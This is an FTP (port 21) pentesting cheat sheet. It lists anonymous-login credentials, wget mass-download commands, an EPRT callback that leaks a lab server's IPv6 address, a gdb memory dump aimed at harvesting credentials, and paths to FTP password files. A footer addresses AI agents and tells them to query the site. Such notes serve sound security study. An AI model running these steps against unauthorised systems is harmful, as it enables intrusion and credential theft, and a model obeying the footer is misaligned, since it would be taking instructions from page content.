# 21 - FTP ### Banner Grabbing ```bash nc -vn 21 openssl s_client -connect somesite.com:21 -starttls ftp ``` ### Anonymous Login ```bash anonymous : anonymous anonymous : ftp : ftp ``` ### Download All Files ```bash wget -m ftp://anonymous:anonymous@10.10.10.98 wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 ``` ### Force IPv6 Callback RFC2428 inform about the function **EPRT** which can be used to connect to another host. The following are sample EPRT commands: ```bash EPRT |1|132.235.1.2|6275| EPRT |2|1080::8:800:200C:417A|5282| ``` EPRT can be used this to send a connection from a victim FTP server back **to our attacking devices**, in order to disclose the victims IPv6 address. EPRT isn't a valid "normal" FTP command, it is a RAW FTP command, so instead of using FTP you need to use telnet port 21. ```bash $ telnet zetta.htb 21 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- USER 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5 331 User 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5 OK. Password required PASS 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5 EPRT |2|dead:beef:2::1008|4488| // my IPv6 address 200-FXP transfer: from 10.10.14.10 to dead:beef:2::1008%160 200 PORT command successful LIST 425 Could not open data connection to port 4488: Connection refused ``` Capture incoming IPv6 address with `tcpdump`. ```bash $ tcpdump -i tun0 -vv ip6 tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes 09:12:32.613603 IP6 (flowlabel 0x6bdb7, hlim 63, next-header TCP (6) payload length: 40) dead:beef::250:56ff:feb9:df29.37250 > kali.4488: Flags [S], cksum 0x64d3 (correct), seq 1305187145, win 28800, options [mss 1337,sackOK,TS val 374756922 ecr 0,nop,wscale 7], length 0 09:12:32.613626 IP6 (flowlabel 0xbe7b8, hlim 64, next-header TCP (6) payload length: 20) kali.4488 > dead:beef::250:56ff:feb9:df29.37250: Flags [R.], cksum 0xa938 (correct), seq 0, ack 1305187146, win 0, length 0 ``` Victim IPv6 address: `dead:beef::250:56ff:feb9:df29` ### Dumping Memory Attach to FTP process and dump it's memory, in hope of finding credentials. ```bash $ gdb -p (gdb) info proc mappings (gdb) q (gdb) dump memory /tmp/.mem (gdb) q $ strings /tmp/.mem // Alternative to 'info proc mappings' to get heap start-end address (gdb) ! grep heap /proc//maps ``` ### Interesting Files 
/etc/ftpusers
/etc/ftpd.conf
/etc/proftpd.conf
/etc/proftpd/proftpd.conf
/etc/proftpd/ftpd.passwd
/etc/vsftpd.conf
/etc/vsftpd/ftpusers
/etc/vsftpd/user_list
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xpthree.gitbook.io/notes/network-services/ports/21-ftp.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.